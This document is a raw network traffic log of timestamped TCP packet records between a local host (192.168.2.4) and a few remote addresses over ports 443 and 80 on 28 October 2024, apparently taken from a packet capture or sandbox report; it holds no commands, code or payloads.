                                                                                                  Oct 28, 2024 12:22:32.309334993 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.309345961 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.309380054 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.310076952 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.310118914 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.310129881 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.310158014 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.310434103 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.310503006 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.310513020 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.310564995 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.315516949 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.315573931 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.315582037 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.315695047 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.320569992 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.320624113 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.320631027 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.320679903 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.323215961 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.323298931 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.323415041 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.323525906 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.326344967 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.326472044 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.326478004 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.326534033 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.329296112 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.329473019 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.329478979 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.329565048 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.332247019 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.332299948 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.332386971 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.332461119 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.335382938 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.335436106 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.335448027 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.335513115 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.338277102 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.338329077 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.338334084 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.338481903 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.341207981 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.341263056 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.341269970 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.341308117 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.344274998 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.344331026 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.344336987 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.344379902 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.346997976 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.347068071 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.347075939 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.347300053 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.350107908 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.350168943 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.350177050 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.350223064 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.352695942 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.352749109 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.352755070 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.352837086 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.355834007 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.355905056 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.355915070 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.355971098 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.358334064 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.358380079 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.358402014 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.358484983 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.361124039 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.361190081 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.361196995 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.361274004 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.363977909 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.364034891 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.364042044 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.364165068 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.366404057 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.366517067 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.366528034 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.366620064 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.369121075 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.369196892 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.369232893 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.369298935 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.371716022 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.371774912 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.371783972 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.371846914 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.374538898 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.374620914 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.374629021 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.374702930 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.377041101 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.377176046 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.377182961 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.377229929 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.379559994 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.379620075 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.379626989 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.379698992 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.382060051 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.382143021 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.382148981 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.382220984 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.384591103 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.384666920 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.384679079 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.384763002 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.387125015 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.387223005 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.387229919 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.387278080 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.389631987 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.389692068 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.389698982 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.389781952 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.392033100 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.392083883 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.392100096 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.392195940 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.424130917 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.424201965 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.424247980 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.424293995 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.426913977 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.426990986 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.426999092 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.427063942 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.427064896 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.427073956 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.427130938 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.427130938 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.427656889 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.427720070 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.427737951 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.427793980 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.427799940 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.427845955 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.428314924 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.428380013 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.428405046 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.428412914 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.428430080 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.428463936 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.428468943 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.428549051 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.429192066 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.429240942 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.429270029 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.429315090 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.429322004 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.429375887 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.429377079 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.429387093 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.429442883 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.430063009 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.430109978 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.430115938 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.430185080 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.430191040 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.430255890 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.430262089 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.430318117 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.431026936 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.431102991 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.431118965 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.431124926 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.431174994 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.431195021 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.431195021 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.431204081 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.431217909 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.431257010 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.431925058 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.431989908 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.431998014 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.432038069 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.432038069 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.432055950 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.432064056 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.432101965 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.432828903 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.432879925 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.432887077 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.432950020 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.433186054 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.433234930 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.433239937 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.433305979 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.433715105 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.433770895 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.433790922 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.433859110 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.435980082 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.436043978 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.436048985 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.436187029 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.440843105 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.440922022 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.440927982 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.441023111 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.441629887 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.441683054 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.441690922 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.441745043 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.443784952 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.443839073 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.443942070 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.444010973 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.445620060 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.445673943 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.445679903 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.445779085 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.447868109 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.447961092 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.447968006 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.448035002 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.449445009 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.449502945 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.449539900 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.449593067 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.451533079 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.451580048 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.451587915 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.451643944 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.453932047 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.453989983 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.453996897 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.454044104 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.455373049 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.455430031 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.455435991 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.455490112 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.459469080 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.459532022 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.459538937 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.459595919 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.459614038 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.459620953 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.459670067 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.459670067 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.459678888 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.459741116 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.459774971 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.459801912 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.459940910 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.460017920 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.460017920 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:33.805449009 CET4973880192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:33.811013937 CET8049738132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:33.811088085 CET4973880192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:33.811286926 CET4973880192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:33.816694975 CET8049738132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:34.677573919 CET8049738132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:34.683379889 CET4973880192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:34.688929081 CET8049738132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:34.945449114 CET8049738132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:34.997068882 CET4973880192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:35.380707979 CET49739443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:35.380780935 CET44349739188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:35.380882978 CET49739443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:35.386585951 CET49739443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:35.386610985 CET44349739188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:36.058154106 CET44349739188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:36.058262110 CET49739443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:36.165066957 CET49739443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:36.165121078 CET44349739188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:36.165400028 CET44349739188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:36.171236038 CET49739443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:36.211354017 CET44349739188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:36.314359903 CET44349739188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:36.314404011 CET44349739188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:36.314512968 CET49739443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:36.384987116 CET49739443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:36.506874084 CET4973880192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:36.512566090 CET8049738132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:36.769855022 CET8049738132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:36.775470972 CET49740443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:36.775556087 CET44349740188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:36.775671005 CET49740443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:36.784687996 CET49740443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:36.784722090 CET44349740188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:36.809592962 CET4973880192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:37.391571999 CET44349740188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:37.393666983 CET49740443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:37.393707037 CET44349740188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:37.535415888 CET44349740188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:37.535456896 CET44349740188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:37.535593987 CET49740443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:37.536086082 CET49740443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:37.540076017 CET4973880192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:37.541178942 CET4974180192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:37.545947075 CET8049738132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:37.546010971 CET4973880192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:37.546606064 CET8049741132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:37.546690941 CET4974180192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:37.546799898 CET4974180192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:37.552237034 CET8049741132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:38.419373989 CET8049741132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:38.421184063 CET49742443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:38.421267986 CET44349742188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:38.421410084 CET49742443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:38.421768904 CET49742443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:38.421804905 CET44349742188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:38.465929031 CET4974180192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:39.028392076 CET44349742188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:39.030493021 CET49742443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:39.030563116 CET44349742188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:39.170938969 CET44349742188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:39.170979023 CET44349742188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:39.171042919 CET49742443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:39.171983957 CET49742443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:39.199606895 CET4974380192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:39.205162048 CET8049743132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:39.205241919 CET4974380192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:39.205363989 CET4974380192.168.2.4132.226.247.73
